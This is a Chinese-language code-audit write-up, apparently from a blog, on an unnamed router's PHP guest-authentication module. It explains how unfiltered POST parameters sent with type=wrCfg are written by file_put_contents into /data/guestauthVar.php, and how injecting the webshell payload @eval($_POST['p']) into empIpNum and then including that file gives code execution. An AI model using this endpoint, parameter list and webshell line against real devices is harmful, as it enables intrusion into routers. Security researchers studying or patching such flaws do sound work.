某路由审计day之文件包含

简介: 某路由审计day之文件包含

以下的操作会比较新手,不是那种利用链pop、cc、cc1、或者任意类调用之类的,还请师傅们见谅,如有不妥的地方,请多多包含。

工具部分:

Seay源代码审计系统、phpstorm64

首先还是自动化审计,可以省下部分时间

0d0c7aa1600314d4427df8302cac5adb_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

一、写文件

以上发现了一些文件操作函数可控的,这就有得玩了,进行跟进/guest_auth/cfg/config.php这个文件。

f83706f7c342fe5fba2584d691a5144e_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


发现了有俩个文件操作函数file_put_contents的参数可控,先看第一个函数的文件名,往上翻就会看到定义的文件名。ps:截图不了这么长的图,就分段发了

06b7b5b69980a7864df46fa21d2491aa_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

在18行处进行了一次判断,判断getIsPostRequest方式是否为真之类的,可以跟进看看。文件在/guest_auth/pub.php

efc902f81ee3e74cc80d862d33918290_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

b20c3cd1f721ed73b4b1081b89e60ab4_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

以上的意思就是判断是否为post还是get请求,可以不用深究,继续往下走。当type=wrCfg时就进入if判断,然后将post获取的请求进行赋值。

4f9b5dbb36db2c30783dc5676aa3dfbc_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

看着参数很多,其实上面的都没进行安全过滤就直接file_put_contents进/data/guestauthVar.php文件。

其需要的参数:

type=wrCfg

empIpNum=

empIpRange=

pc_disable=

pcTimeNum=

pcTimeRange=

mb_disable=

mbTimeNum=

mbTimeRange=

empIdTimes=

empAuthLocal=

empAuthSms=

empAuthLdap=

guestIpNum=

guestIpRange=

guestAllowTime=

guestAuthPas=

guestAuthAct=

serIpAddr=

netType=

guestAuthTimes=

以下的判断可以以字符、字符串来进行绕过。

a1deb81f3cf2e35d1eb29092754c0076_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

d56549475e8dde310f6b88b1afa80946_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

这里empIpNum参数我是赋值为@eval($_POST[‘p’]),而其他都是赋值为false。

92cd966401b9f7eb5e7b4e95a106ca36_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

6a70aa3f2e8122ba554d2c4a54b17048_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

二、文件包含

a5f52c04fff821ceb08686bdb981e06b_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

可以全局搜索包含这个文件的文件,然后来进行文件包含并执行漏洞


e2342cf2e0278721d341f95efd74fb7d_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

相关文章
|
安全 小程序 PHP
PHP代码审计(五)PHP代码审计方法与步骤
(1):获取到网站源码(这就是废话……) (2):将网站部署到你自己的环境中,能运行。 这里特殊说明一下我的习惯,我本地的环境与线上的环境基本上保持一致,这样在本地审计及线上部署的时候能发现更多的问题。不建议说是随便搭个环境能跑起来就行,这样不是很严谨。 (3):拿到源码之后,浏览大概的项目结构。
144 0
|
5月前
|
SQL 安全 API
PHP代码审计示例(一)——淡然点图标系统SQL注入漏洞审计
PHP代码审计示例(一)——淡然点图标系统SQL注入漏洞审计
122 4
|
SQL 缓存 安全
PHP代码审计之taocms(二)
PHP代码审计之taocms
148 0
PHP代码审计之taocms(二)
|
SQL 安全 关系型数据库
PHP代码审计之taocms(一)
PHP代码审计之taocms
299 0
PHP代码审计之taocms(一)
|
机器学习/深度学习 网络协议 安全
【网络安全】利用samba服务绕过未开启文件包含配置
利用samba服务绕过未开启文件包含配置
168 0
【网络安全】利用samba服务绕过未开启文件包含配置
|
机器学习/深度学习 存储 安全
|
SQL 机器学习/深度学习 网络协议
撰写一组SNORT规则防御SQL注入
http://bbs.chinaunix.net/viewthread.php?tid=1211897 修改错误的地方:load_file()这里应该是 (/%3D|=)+(/S|/s)+((...
1563 0
|
安全 中间件 Shell
文件包含漏洞利用方式-日志注入getshell
中间件的日志文件会保存网站的访问记录,比如HTTP请求行,User-Agent,Referer等客户端信息 如果在HTTP请求中插入恶意代码,那么恶意代码就会保存到日志文件中,访问日志文件的时候,日志文件中的恶意代码就会执行,从而造成任意代码执行甚至获取shell 比如使用代理工具抓包,在HTTP请求中插入一句话木马,访问日志文件时会执行一句话木马,然后使用蚁剑等工具链接,从而getshell
741 0
文件包含漏洞利用方式-日志注入getshell
|
安全 网络协议 Java
斩断Log4j2 RCE漏洞验证和利用链,主动外联管控你值得拥有
本文将介绍Apache Log4j2远程代码执行漏洞常见的验证、利用方式及其原理,并给出基于外联管控的防护方案。
1797 0
斩断Log4j2 RCE漏洞验证和利用链,主动外联管控你值得拥有
|
安全 .NET PHP
如何解决您的虚拟主机中有文件触发了安全防护报警规则,可能存在webshell网页木马
早上刚上班就有新客户咨询我们Sinesafe安全公司反映说收到一条阿里云的短信过来,内容为:网站木马文件提醒018-06-20 09:20:49尊敬的***网:您的虚拟主机中有文件触发了安全防护报警规则,可能存在webshell网页木马,您可以登录虚拟主机控制台-对应主机的"管理"文件管理-网站木马查杀功能确认是否为恶意文件,相关帮助文档请参考网站木马查杀帮助。
2503 0